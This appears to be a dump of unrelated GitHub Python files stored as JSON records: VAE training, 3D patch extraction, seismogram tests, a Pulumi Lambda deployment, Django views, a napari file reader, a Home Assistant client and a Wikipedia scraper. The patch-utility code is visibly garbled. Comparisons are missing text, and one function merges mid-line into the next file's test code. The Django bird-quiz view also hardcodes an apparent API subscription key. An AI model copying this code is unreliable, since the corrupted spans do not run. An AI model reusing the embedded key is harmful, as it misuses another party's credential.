[{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tAnnealing-Factor: {:.3f}'.format(\n epoch, batch_idx * batch_size, len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), train_loss_meter.avg, annealing_factor))\n\n print('====> Epoch: {}\\tLoss: {:.4f}'.format(epoch, train_loss_meter.avg))\n\n\n def test(epoch):\n model.eval()\n test_loss = 0\n\n # for simplicitly, here i'm only going to track the joint loss. \n pbar = tqdm(total=len(test_loader))\n for batch_idx, (image, attrs) in enumerate(test_loader):\n if args.cuda:\n image, attrs = image.cuda(), attrs.cuda()\n image = Variable(image, volatile=True)\n attrs = Variable(attrs, volatile=True)\n batch_size = image.size(0)\n attrs = tensor_2d_to_list(attrs)\n # compute the elbo using all data.\n recon_image, recon_attrs, mu, logvar = model(image, attrs)\n test_loss += elbo_loss([recon_image] + recon_attrs, [image] + attrs, mu, logvar).data[0]\n pbar.update()\n\n pbar.close()\n test_loss /= len(test_loader)\n print('====> Test Loss: {:.4f}'.format(test_loss))\n return test_loss\n\n\n best_loss = sys.maxint\n for epoch in range(1, args.epochs + 1):\n train(epoch)\n loss = test(epoch)\n is_best = loss < best_loss\n best_loss = min(loss, best_loss)\n # save the best model and current model\n save_checkpoint({\n 'state_dict': model.state_dict(),\n 'best_loss': best_loss,\n 'n_latents': args.n_latents,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, folder=args.out_dir) \n","repo_name":"mhw32/multimodal-vae-public","sub_path":"celeba19/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14718,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"50"} +{"seq_id":"228731882","text":"import numpy as np \nimport random\nimport config as cf\ndef resize_by_padding(volume, size_to_reshape=(256,256,256)):\n\t\"\"\"\n\tResizes the given volume by zero padding to get the size_to_reshape\n\t---------------------\n\tParams: \n\tvolume - Numpy array\n\tsize_to_reshape - Tuple of size\n\t---------------------\n\tOutput:\n\tNumpy array with the shape of size_to_reshape having the appropriate zero padding\n\t\"\"\"\n\n\tin_shape = list(volume.shape)\n\tout_shape = list(size_to_reshape)\n\n\n\tif out_shape[0]in_shape[0] or out_shape[1]>in_shape[1] or out_shape[2]>in_shape[2]:\n\t\traise Exception(\"The requested volume to be extracted is bigger than the input volume\")\t\n\textracted_volume = volume[:out_shape[0], :out_shape[1], :out_shape[2]]\n\n\treturn extracted_volume\ndef _no_of_patches(in_shape, patch_size, stride_size):\n\t\"\"\"\n\tGet the number of patches that can be extracted from the volume given the patch size and stride size\n\t-------------------\n\tParams:\n\tin_shape - Shape of the input volume as a List\n\tpatch_size - Size of patch as a List\n\tstride_size - Stride as a list\n\t-------------------\n\tOutput: no of patches as a list\n\t\"\"\"\n\tno_of_patches = []\n\n\tfor i in range(len(in_shape)):\n\t\tno_of_patches.append(((in_shape[i] - patch_size[i])//stride_size[i]) + 1)\n\n\treturn no_of_patches\ndef generate_patch_volumes(volume, patch_size=(128,128,128), stride_size=(32,32,32)):\n\t\"\"\"\n\tGiven a 3d volume, creates a list of patches according to the patch size and the stride size given as an input\n\t-------------------\n\tParams:\n\tvolume: Numpy array\n\tpatch_size: tuple indicating the size of patches to extract\n\tstride_size: tuple indicating the dim to moven when extracting the pathces\n\t-------------------\n\tOutput:\n\n\t\"\"\"\n\n\tin_shape = list(volume.shape)\n\tpatch_size = list(patch_size)\n\tstride_size = list(stride_size)\n\n\tno_of_patches = _no_of_patches(in_shape, patch_size, stride_size)\n\n\tlist_of_patches = []\n\t\n\ttemp_vol = volume\n\tfor i in range(no_of_patches[0]):\n\t\tfor j in range(no_of_patches[1]):\n\t\t\tfor k in range(no_of_patches[2]):\n\n\t\t\t\ttemp_extracted = extract_volume(temp_vol,shape_to_extract = patch_size)\n\t\t\t\tlist_of_patches.append(temp_extracted)\n\t\t\t\ttemp_vol = volume[stride_size[0]*i:, stride_size[1]*j:, stride_size[2]*k:]\n\t\t\t\t\n\treturn list_of_patches\n\n\ndef generate_patch_startid_list(volume_shape=(256,256,160), patch_size=(128,128,128), stride_size=(32,32,32)):\n\t\"\"\"\n\tGiven a 3d volume, creates a list of patches according to the patch size and the stride size given as an input\n\t-------------------\n\tParams:\n\tvolume: tuple indicating the shape of volume\n\tpatch_size: tuple indicating the size of patches to extract\n\tstride_size: tuple indicating the dim to moven when extracting the pathces\n\t-------------------\n\tOutput:\n\tList containing the start ids (tuples) of all possible patches\n\t\"\"\"\n\n\tin_shape = list(volume_shape)\n\tpatch_size = list(patch_size)\n\tstride_size = list(stride_size)\n\n\tno_of_patches = _no_of_patches(in_shape, patch_size, stride_size)\n\n\t#list_of_patches = []\n\tlist_patch_startidx = []\n\t#temp_vol = volume\n\tfor i in range(no_of_patches[0]):\n\t\tfor j in range(no_of_patches[1]):\n\t\t\tfor k in range(no_of_patches[2]):\n\n\t\t\t\t#temp_extracted = extract_volume(temp_vol,shape_to_extract = patch_size)\n\t\t\t\t#list_of_patches.append(temp_extracted)\n\t\t\t\t#temp_vol = volume[stride_size[0]*i:, stride_size[1]*j:, stride_size[2]*k:]\n\t\t\t\ttemp_start_idx = (stride_size[0]*i, stride_size[1]*j, stride_size[2]*k)\n\t\t\t\tlist_patch_startidx.append(temp_start_idx)\n\t#return list_of_patches, list_patch_startidx\n\treturn list_patch_startidx\n\n\n\ndef get_patch(volume, patch_size, patch_start_idx):\n\t\"\"\"\n\tReturn the patch of volume \n\t---------------\n\tParams:\n\tvolume: Np array of input vol\n\tpatch_size: tuple of patch size\n\tpatch_start_idx: The starting voxel of the patch\n\t--------------\n\tOutput:\n\tNp array of volume of the requested patch\n\t\"\"\"\n\n\ttemp_vol = volume[patch_start_idx[0]:, patch_start_idx[1]:, patch_start_idx[2]:]\n\tpatch_volume = extract_volume(temp_vol, shape_to_extract = patch_size)\n\treturn patch_volume\n\ndef convert_to_one_hot(volume, labels=cf.DATA_LABELS_DICT):\n\t\"\"\"\n\tConverts the label map to a on hot encoded matrix\n\t---------------\n\tParams:\n\tVolume: Np array of label map\n\tLabels: Dict of class names and values in the label map\n\t---------------\n\tOutput:\n\tOne hot encoded matrix with shape (*dim, channels)\n\t\"\"\"\n\t#print(\"Label convention: \",labels)\n\tno_channels = len(labels)\n\tone_hot_label = np.zeros((*volume.shape, no_channels))\n\n\tfor i,label in enumerate(labels):\n\t\t#if labels[label]!=0:\n\t\tone_hot_label[volume.astype(int)==labels[label],i] = 1\n\n\treturn one_hot_label\n\ndef is_valid_patch(volume,no_label_pixels = cf.LABEL_PIXELS_THRESHOLD):\n\t\"\"\"\n\tTo know if a patch of volume is valid. The condition to satisfy for a valid patch is \n\tnon zero elements of volume should be >= LABEL_PIXELS_THRESHOLD\n\t-------------------\n\tOutput:\n\tTrue or False\n\t\"\"\"\n\n\tnon_zero_voxels = np.count_nonzero(volume)\n\tif non_zero_voxels None:\n \"\"\"Test creating an instance.\"\"\"\n\n miniseis = MiniSeismogram()\n assert isinstance(miniseis, MiniSeismogram)\n assert isinstance(miniseis, Seismogram)\n\n @pytest.mark.depends(name=\"test_create_instance\")\n def test_defaults(self) -> None:\n \"\"\"Test default attributes.\"\"\"\n\n miniseis = MiniSeismogram()\n assert miniseis.begin_time.year == SEISMOGRAM_DEFAULTS.begin_time.year == 1970\n assert miniseis.begin_time.month == SEISMOGRAM_DEFAULTS.begin_time.month == 1\n assert miniseis.begin_time.day == SEISMOGRAM_DEFAULTS.begin_time.day == 1\n assert miniseis.begin_time.hour == SEISMOGRAM_DEFAULTS.begin_time.hour == 0\n assert miniseis.begin_time.minute == SEISMOGRAM_DEFAULTS.begin_time.minute == 0\n assert miniseis.begin_time.second == SEISMOGRAM_DEFAULTS.begin_time.second == 0\n assert (\n miniseis.begin_time.microsecond\n == SEISMOGRAM_DEFAULTS.begin_time.microsecond\n == 0\n )\n assert miniseis.delta == SEISMOGRAM_DEFAULTS.delta == 1\n assert miniseis.data.size == 0\n assert len(miniseis) == 0\n\n @pytest.mark.depends(name=\"test_create_instance\")\n def test_change_attributes(self) -> None:\n miniseis = MiniSeismogram()\n random_data = np.random.rand(1000)\n new_time = datetime.fromisoformat(\"2011-11-04T00:05:23.123\")\n miniseis.data = random_data\n assert miniseis.data.all() == random_data.all()\n assert miniseis.end_time - miniseis.begin_time == timedelta(\n seconds=miniseis.delta * (len(miniseis) - 1)\n )\n miniseis.begin_time = new_time\n assert miniseis.begin_time == new_time\n assert miniseis.end_time - miniseis.begin_time == timedelta(\n seconds=miniseis.delta * (len(miniseis) - 1)\n )\n miniseis.delta = 0.1\n assert miniseis.delta == 0.1\n assert miniseis.end_time - miniseis.begin_time == timedelta(\n seconds=miniseis.delta * (len(miniseis) - 1)\n )\n\n @pytest.mark.depends(name=\"test_change_attributes\")\n def test_as_seismogram(self) -> None:\n \"\"\"check if it works in a functionfor Seismogram types.\"\"\"\n\n def seis_func(seismogram: Seismogram) -> None:\n _ = len(seismogram)\n _ = np.mean(seismogram.data)\n _ = seismogram.delta * 1.1\n _ = seismogram.begin_time + timedelta(seconds=12)\n _ = seismogram.end_time + timedelta(seconds=12)\n\n miniseis = MiniSeismogram(data=np.random.rand(1000))\n seis_func(miniseis)\n\n\nclass TestMiniSeismogramMethods:\n @pytest.fixture\n def mini_seismogram(self) -> MiniSeismogram:\n return MiniSeismogram(data=np.random.rand(1000))\n\n def test_clone(self) -> None:\n # create sac seismogram and add data\n data = np.random.rand(1000)\n sac_seis = SAC().seismogram\n sac_seis.data = data\n sac_seis.delta = 0.1\n sac_seis.begin_time = datetime.now(timezone.utc)\n\n # clone and check attributes are identical\n mini_seis = MiniSeismogram.clone(sac_seis)\n npt.assert_allclose(sac_seis.data, mini_seis.data)\n assert sac_seis.data is not mini_seis.data\n assert sac_seis.begin_time == mini_seis.begin_time\n assert sac_seis.begin_time is not mini_seis.begin_time\n assert sac_seis.delta == mini_seis.delta\n assert sac_seis.end_time == mini_seis.end_time\n\n # verify changes in clone don't affect input seismogram\n mini_seis.data[0] *= 2\n with npt.assert_raises(AssertionError):\n npt.assert_allclose(sac_seis.data, mini_seis.data)\n mini_seis.begin_time = datetime.now(timezone.utc)\n assert sac_seis.begin_time != mini_seis.begin_time\n mini_seis.delta *= 2\n assert sac_seis.delta != mini_seis.delta\n assert sac_seis.end_time != mini_seis.end_time\n\n # create clone without data\n mini_seis = MiniSeismogram.clone(sac_seis, skip_data=True)\n npt.assert_allclose(mini_seis.data, np.array([]))\n\n def test_normalize(self, mini_seismogram: MiniSeismogram) -> None:\n mini_seismogram.normalize()\n assert np.max(mini_seismogram.data) <= 1\n\n def test_detrend(self, mini_seismogram: MiniSeismogram) -> None:\n mini_seismogram.detrend()\n assert 0 == pytest.approx(np.mean(mini_seismogram.data), abs=1e-11)\n\n def test_resample(self, mini_seismogram: MiniSeismogram) -> None:\n old_delta = mini_seismogram.delta\n old_len = len(mini_seismogram)\n new_delta = old_delta * 2\n mini_seismogram.resample(new_delta)\n assert len(mini_seismogram) * 2 == old_len\n assert mini_seismogram.delta == new_delta\n","repo_name":"pysmo/pysmo","sub_path":"tests/classes/mini/test_mini_seismogram.py","file_name":"test_mini_seismogram.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"50"} +{"seq_id":"16251738520","text":"import json\n\nfrom pulumi_aws import iam, lambda_, s3\nimport pulumi\nfrom pulumi import Output\n\nfrom modules.s3 import bucket\nfrom modules.iam import LAMBDA_ASSUME_ROLE_POLICY\nfrom modules.iam import CREATE_CW_LOGS_POLICY\nfrom modules.sns import sns_topic\nfrom modules.sns import weapons_topic\nfrom modules.kinesis import chat_stream\nfrom modules.s3 import bucket\nfrom modules.sqs import gods_queue\nfrom modules.dynamodb import dynamodb_table\nfrom modules.layers import dependency_layer\n\n\nMODULE_NAME = \"morgue-bot\"\n\nconfig = pulumi.Config()\n\n\nrole = iam.Role(\n f\"{MODULE_NAME}-lambda-role\",\n assume_role_policy=json.dumps(LAMBDA_ASSUME_ROLE_POLICY),\n)\n\npolicy = Output.all(\n bucket.arn, sns_topic.arn, weapons_topic.arn, dynamodb_table.arn, chat_stream.arn\n).apply(\n lambda args: json.dumps(\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n CREATE_CW_LOGS_POLICY,\n {\"Effect\": \"Allow\", \"Action\": [\"s3:Get*\"], \"Resource\": args[0]},\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"sns:Publish\"],\n \"Resource\": [args[1], args[2]],\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"dynamodb:scan\",\n \"dynamodb:GetItem\",\n \"dynamodb:PutItem\",\n \"dynamodb:UpdateItem\",\n ],\n \"Resource\": args[3],\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"kinesis:PutRecord\"],\n \"Resource\": args[4],\n },\n ],\n }\n )\n)\n\niam.RolePolicyAttachment(\n f\"{MODULE_NAME}-xray\",\n policy_arn=\"arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess\",\n role=role.id,\n)\n\niam.RolePolicy(f\"{MODULE_NAME}-lambda-role-policy\", role=role.id, policy=policy)\n\nlambda_variables = Output.all(\n dynamodb_table.name, bucket.id, chat_stream.arn, chat_stream.name, sns_topic.arn\n).apply(\n lambda args: {\n \"CHARACTER_DB\": args[0],\n \"MORGUE_BUCKETNAME\": args[1],\n \"CHAT_STREAM_ARN\": args[2],\n \"CHAT_STREAM_NAME\": args[3],\n \"TOPIC_ARN\": args[4],\n }\n)\n\naws_lambda = lambda_.Function(\n f\"{MODULE_NAME}\",\n role=role.arn,\n runtime=\"python3.6\",\n handler=\"lambda_handler.morgue_bot\",\n s3_key=config.require(\"artifact_name\"),\n s3_bucket=\"morgue-artifacts\",\n timeout=200,\n tracing_config={\"mode\": \"Active\"},\n environment={\"variables\": lambda_variables},\n layers=[dependency_layer.arn],\n)\n\nlambda_.Permission(\n \"AllowInvocationFromMorgueFileBucket\",\n action=\"lambda:InvokeFunction\",\n function=aws_lambda.arn,\n principal=\"s3.amazonaws.com\",\n source_arn=bucket.arn,\n)\n\ns3.BucketNotification(\n f\"{MODULE_NAME}-new-morgue-files\",\n bucket=bucket.id,\n lambda_functions=[\n {\"events\": [\"s3:ObjectCreated:*\"], \"lambda_function_arn\": aws_lambda.arn}\n ],\n)\n","repo_name":"davidbegin/morguebot","sub_path":"deploy/modules/morgue_bot_lambda.py","file_name":"morgue_bot_lambda.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"50"} +{"seq_id":"3569217003","text":"'''\nWe will write fibonacci with for.\nItt goes like fibonacci = 1 1 2 3 5 8 13...\n'''\n\na = 1\nb = 1\n\nfibonacci = [a,b]\n\nfor x in range(20):\n a,b = b,a+b\n print(\"a: {} b: {}\".format(a,b))\n fibonacci.append(b)\n\nprint(fibonacci)","repo_name":"SametZenginx/MyPythonProject","sub_path":"3-Loop-structures/Fibonacci series with for loop.py","file_name":"Fibonacci series with for loop.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17811688308","text":"import re\n\nnumber_of_bosses = int(input())\n\nfor boss in range(number_of_bosses):\n data = input()\n pattern = r\"\\|([A-Z]{4,})\\|:#([a-zA-Z]+ [a-zA-Z]+)#\"\n\n matches = re.findall(pattern, data)\n\n if matches:\n print(f\"{matches[0][0]}, The {matches[0][1]}\")\n else:\n print(\"Access denied!\")\n\n other_matches = re.finditer(pattern, data)\n\n for match in other_matches:\n print(f\">> Strength: {len(match.group(1))}\")\n print(f\">> Armor: {len(match.group(2))}\")\n\n\n\n","repo_name":"giorno39/softuni_fund_python","sub_path":"last_exam/boss_rush.py","file_name":"boss_rush.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31008244497","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Requested_document,Complaint,Suggestion\nfrom django.db import models\n\nUser = get_user_model()\n\n@login_required\ndef requested_doc(request):\n\tcontext = {\n\t\t'documents': Requested_document.objects.all()\n\t}\n\treturn render(request,'Requested_docs.html',context)\n\n@login_required\ndef sent_complaint(request):\n\tcontext = {\n\t\t'complaints': Complaint.objects.all()\n\t}\n\treturn render(request,'recieved-complaints.html',context)\n\n@login_required\ndef sent_suggestion(request):\n\tcontext = {\n\t\t'suggestions': Suggestion.objects.all()\n\t}\n\treturn render(request,'recieved-suggestions.html',context)","repo_name":"TrellixVulnTeam/E-barangay_OVR5","sub_path":"djangoproject/Services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22346027667","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\n\nfrom .models import Bird, Group\n\nimport json, http.client, urllib.request, urllib.parse, urllib.error, base64, random\n\n\ndef index(request):\n headers = {\n # Request headers\n 'Ocp-Apim-Subscription-Key': '52e1f43aa3114e8b924af3f84693877b',\n }\n\n\n\n result_id = random.randrange(10)\n random_index = 0#random.randint(0, Bird.objects.count() - 1)\n correct_bird = Bird.objects.all()[random_index].common_name\n correct_index = random.randint(0, 4)\n wrong_indices = []\n choices = []\n\n for i in range(0,4):\n found_unique = False\n while not found_unique:\n check_index = random.randint(0, Bird.objects.count() - 1)\n if (check_index != random_index) and not (check_index in wrong_indices):\n wrong_indices.append(check_index)\n found_unique = True\n choices.append(Bird.objects.all()[check_index].common_name)\n\n\n choices.insert(correct_index, correct_bird)\n\n bird_groups = [g.name for g in Group.objects.filter()]\n\n params = urllib.parse.urlencode({\n # Request parameters\n 'q': correct_bird,\n 'count': '10',\n 'offset': '0',\n 'mkt': 'en-us',\n 'safeSearch': 'Moderate',\n })\n\n img_url = \"\"\n\n\n try:\n conn = http.client.HTTPSConnection('api.cognitive.microsoft.com')\n conn.request(\"GET\", \"/bing/v5.0/images/search?%s\" % params, \"{body}\", headers)\n response = conn.getresponse()\n data = response.read().decode('utf-8')\n parsed_data = json.loads(data)\n img_url = (parsed_data['value'][result_id]['thumbnailUrl'])\n conn.close()\n except Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))\n\n context = {\n 'bird_groups' : bird_groups,\n 'choices' : choices,\n 'correct_index' : correct_index,\n 'img_url' : img_url,\n }\n return render(request, 'bird_quiz/index.html', context)\n\ndef question(request):\n return HttpResponse(\"You're looking at a question\")\n\n\n","repo_name":"MBAustin/bird_is_the_word","sub_path":"bird_quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"39351812118","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nimport logging\r\nimport json\r\n\r\nclass Movie(object):\r\n name = \"\"\r\n year = 0\r\n gross = 0\r\n actors = []\r\n \r\nlogging.basicConfig(filename='WebScraper.log',level=logging.DEBUG)\r\n\r\n#lists to hold data, movies are in an object, actors are tuple\r\nall_movies=[]\r\nall_actors=[]\r\njson_actors=[]\r\njson_movies=[]\r\nmoviedict={}\r\nactordict={}\r\n\r\nurl = \"https://en.wikipedia.org/wiki/Morgan_Freeman\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-width'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n all_movies.append(ele.get('href'))\r\n #print(ele.get('href'))\r\nlogging.info(\"First of three starter pages parsed, all movies added\")\r\nurl = \"https://en.wikipedia.org/wiki/Johnny_Depp\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-width'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n all_movies.append(ele.get('href'))\r\n #print(ele.get('href'))\r\nlogging.info(\"Second of three starter pages parsed, all movies added\")\r\nurl = \"https://en.wikipedia.org/wiki/Adam_Sandler\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-count column-count-2'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n all_movies.append(ele.get('href'))\r\n #print(ele.get('href'))\r\nlogging.info(\"Third of three starter pages parsed, all movies added\")\r\n#while len(all_movies)<125 or len(all_actors)<250:\r\n\r\nfor movie in all_movies:\r\n url = \"https://en.wikipedia.org\"+movie\r\n logging.debug(\"Accessing page \"+movie+\" to find actors\")\r\n r = requests.get(url)\r\n data = r.content\r\n soup = BeautifulSoup(data, 'html.parser')\r\n pattern = re.compile(r'Starring')\r\n tags = soup.find(text=pattern).parent\r\n tag2 = tags.findNext('ul')\r\n link = tag2.findAll('a')\r\n tempActors=[]\r\n for ele in link:\r\n if ele.find(\"wiki\")!=-1:\r\n all_actors.append(ele.get('href'))\r\n tempActors.append(ele.get('href')[6:])\r\n logging.info(\"All actors from page\" +movie+ \" added\")\r\n pattern = re.compile(r'Release date')\r\n tags = soup.find(text=pattern)\r\n if tags is None:\r\n logging.warning(\"Could not find the release date from \" +movie+\": Skipping this page\")\r\n continue\r\n \r\n tag2 = tags.parent.findNext('ul')\r\n tag3 = tag2.findNext('li')\r\n tempYear = tag3.text\r\n tempYear = tempYear.replace(u'\\xa0', u' ')\r\n logging.info(\"Added release date from page\" +movie)\r\n pattern = re.compile(r'Box office')\r\n tags = soup.find(text=pattern)\r\n if tags is None:\r\n logging.warning(\"Could not find the movie gross from \" +movie+\": Skipping this page\")\r\n continue\r\n tag2 = tags.parent.findNext('td')\r\n tempGross = tag2.text\r\n if tempGross[-1] == ']':\r\n tempGross = tag2.text[:-3]\r\n logging.info(\"Added total gross from page\" +movie)\r\n result = (movie[6:], tempYear, tempGross, tempActors)\r\n json_movies.append(result)\r\n print(result)\r\n moviedict[movie[6:]]=(tempYear, tempGross, tempActors) \r\n\r\nlogging.debug(\"Accessing actor list to find age\")\r\n\r\nall_actors=list(set(all_actors))\r\n\r\nwhile len(json_actors)<300:\r\n for actor in all_actors:\r\n url = \"https://en.wikipedia.org\"+actor\r\n r = requests.get(url)\r\n data = r.content\r\n soup = BeautifulSoup(data, 'html.parser')\r\n tags = soup.find('span',{'class' : 'noprint ForceAgeToShow'})\r\n if tags is None:\r\n logging.warning(\"Could not find the actor age for \" +actor+\": Skipping this page\")\r\n continue\r\n json_actors.append((actor[6:], tags.text[5:-1]))\r\n print(actor[6:], tags.text[5:-1])\r\n actordict[actor[6:]]=tags.text[5:-1]\r\n logging.info(\"Moving onto next actor\")\r\nprint(len(json_movies))\r\nprint(len(json_actors))\r\nprint(json_movies)\r\nprint(json_actors)\r\n\r\nwith open('moviedata.txt', 'w+') as outfile:\r\n json.dump(json_movies, outfile)\r\nwith open('actordata.txt', 'w+') as outfile:\r\n json.dump(json_actors, outfile) \r\nwith open('moviedict.txt', 'w+') as outfile:\r\n json.dump(moviedict, outfile)\r\nwith open('actordict.txt', 'w+') as outfile:\r\n json.dump(actordict, outfile) \r\n","repo_name":"KaiwenXue/Projects","sub_path":"Webspider/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5926380646","text":"\"\"\"\nThis module is an example of a barebones numpy reader plugin for napari.\n\nIt implements the Reader specification, but your plugin may choose to\nimplement multiple readers or even other plugin contributions. see:\nhttps://napari.org/stable/plugins/guides.html?#readers\n\"\"\"\nimport mrcfile\nimport numpy as np\n\n\ndef napari_get_reader(path):\n \"\"\"A basic implementation of a Reader contribution.\n\n Parameters\n ----------\n path : str or list of str\n Path to file, or list of paths.\n\n Returns\n -------\n function or None\n If the path is a recognized format, return a function that accepts the\n same path or list of paths, and returns a list of layer data tuples.\n \"\"\"\n if isinstance(path, list):\n # reader plugins may be handed single path, or a list of paths.\n # if it is a list, it is assumed to be an image stack...\n # so we are only going to look at the first file.\n path = path[0]\n\n # if we know we cannot read the file, we immediately return None.\n extensions = (\n '.mrc',\n '.mrcs',\n '.map',\n '.st',\n '.rec',\n '.preali',\n '.ali',\n )\n if not path.endswith(extensions):\n return None\n\n # otherwise we return the *function* that can read ``path``.\n return reader_function\n\n\ndef reader_function(path):\n \"\"\"Take a path or list of paths and return a list of LayerData tuples.\n\n Readers are expected to return data as a list of tuples, where each tuple\n is (data, [add_kwargs, [layer_type]]), \"add_kwargs\" and \"layer_type\" are\n both optional.\n\n Parameters\n ----------\n path : str or list of str\n Path to file, or list of paths.\n\n Returns\n -------\n layer_data : list of tuples\n A list of LayerData tuples where each tuple in the list contains\n (data, metadata, layer_type), where data is a numpy array, metadata is\n a dict of keyword arguments for the corresponding viewer.add_* method\n in napari, and layer_type is a lower-case string naming the type of layer.\n Both \"meta\", and \"layer_type\" are optional. napari will default to\n layer_type==\"image\" if not provided\n \"\"\"\n # handle both a string and a list of strings\n paths = [path] if isinstance(path, str) else path\n\n # optional kwargs for the corresponding viewer.add_* method\n # https://napari.org/docs/api/napari.components.html#module-napari.components.add_layers_mixin\n add_kwargs = {}\n\n # optional, default is \"image\"\n layer_type = \"image\"\n\n # load all files into array\n layer_data = []\n for _path in paths:\n\n # Read mrcfile as a memory mapped file\n data = mrcfile.mmap(_path, permissive=True).data\n\n # Append two layers if the data type is complex\n if data.dtype in [np.complex64, np.complex128]:\n layer_data.append((np.abs(data), {\"name\": \"amplitude\"}, layer_type))\n layer_data.append((np.angle(data), {\"name\": \"phase\"}, layer_type))\n else:\n layer_data.append((data, add_kwargs, layer_type))\n\n return layer_data\n","repo_name":"alisterburt/napari-mrcfile-reader","sub_path":"src/napari_mrcfile_reader/_reader.py","file_name":"_reader.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"50"} +{"seq_id":"33320374824","text":"# -*- coding: utf-8 -*-\n\nfrom architect.manager.client import BaseClient\nimport homeassistant.remote as remote\nfrom homeassistant.exceptions import HomeAssistantError\nfrom celery.utils.log import get_logger\n\nlogger = get_logger(__name__)\n\nDEFAULT_RESOURCES = [\n 'hass_entity',\n]\n\n\nclass HomeAssistantClient(BaseClient):\n\n def __init__(self, **kwargs):\n super(HomeAssistantClient, self).__init__(**kwargs)\n\n def auth(self):\n status = True\n try:\n self.api = remote.API(self.metadata['host'],\n self.metadata['password'],\n self.metadata.get('port', 8123),\n self.metadata.get('use_ssl', False))\n except HomeAssistantError as exception:\n logger.error(exception)\n status = False\n return status\n\n def update_resources(self, resources=None):\n if self.auth():\n if resources is None:\n resources = DEFAULT_RESOURCES\n for resource in resources:\n metadata = self.get_resource_metadata(resource)\n self.process_resource_metadata(resource, metadata)\n count = len(self.resources.get(resource, {}))\n logger.info(\"Processed {} {} resources\".format(count,\n resource))\n self.process_relation_metadata()\n\n def get_resource_status(self, kind, metadata):\n return 'unknown'\n\n def get_resource_metadata(self, kind):\n logger.info(\"Getting {} resources\".format(kind))\n response = []\n if kind == 'hass_entity':\n response = remote.get_states(self.api)\n return response\n\n def process_resource_metadata(self, kind, metadata):\n if kind == 'hass_entity':\n for resource in metadata:\n metadata = resource.as_dict()\n if 'last_changed' in metadata:\n metadata['last_changed'] = metadata['last_changed'].isoformat()\n if 'last_updated' in metadata:\n metadata['last_updated'] = metadata['last_updated'].isoformat()\n self._create_resource(metadata['entity_id'],\n metadata['entity_id'],\n 'hass_entity',\n metadata=metadata)\n\n def process_relation_metadata(self):\n pass\n","repo_name":"perlchild/architect-api","sub_path":"architect/manager/engine/homeassistant/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"40119070180","text":"import sqlite3\nimport json\nimport subprocess\nimport shutil\n\n# Open the SQLite database file\nconn = sqlite3.connect('test_myTagName.db')\ncursor = conn.cursor()\n\n# Execute the SELECT query\ncursor.execute('SELECT * FROM IOV')\n\n# Fetch all the results from the query\nresults = cursor.fetchall()\n\n# Create an empty list to store the extracted values\nextracted_values = []\n\n# Extract the desired part of the string and add it to the list\nfor row in results:\n value = row[0].split('|')[0].strip()\n extracted_values.append(value)\n\n# Close the database connection\nconn.close()\n\n# Generate the JSON file and execute the command for each extracted value\nfor value in extracted_values:\n print(\"uploading\",value)\n # Create the dictionary for the JSON structure\n data = {\n \"destinationDatabase\": \"oracle://cms_orcoff_prep/CMS_CONDITIONS\",\n \"destinationTags\": {\n \"SimBeamSpot_\" + value + \"_v1_mc\": {}\n },\n \"inputTag\": value,\n \"since\": None,\n \"userText\": value\n }\n \n # Generate the JSON file\n filename = \"test_myTagName.txt\"\n with open(filename, 'w') as file:\n json.dump(data, file, indent=4)\n \n # Execute the command to upload conditions\n subprocess.call([\"uploadConditions.py\", \"test_myTagName.db\"])\n\n # Generate the new filename\n new_filename = \"test_\" + value + \".txt\"\n \n # Move the file to the new name\n shutil.move(filename, new_filename)\n\n # Print a success message\n print(\"Uploaded conditions for value:\", value)\n","repo_name":"cms-sw/cmssw","sub_path":"CondTools/BeamSpot/test/extractAndUploadAll.py","file_name":"extractAndUploadAll.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"27363800298","text":"\"\"\"A Python Flask REST API 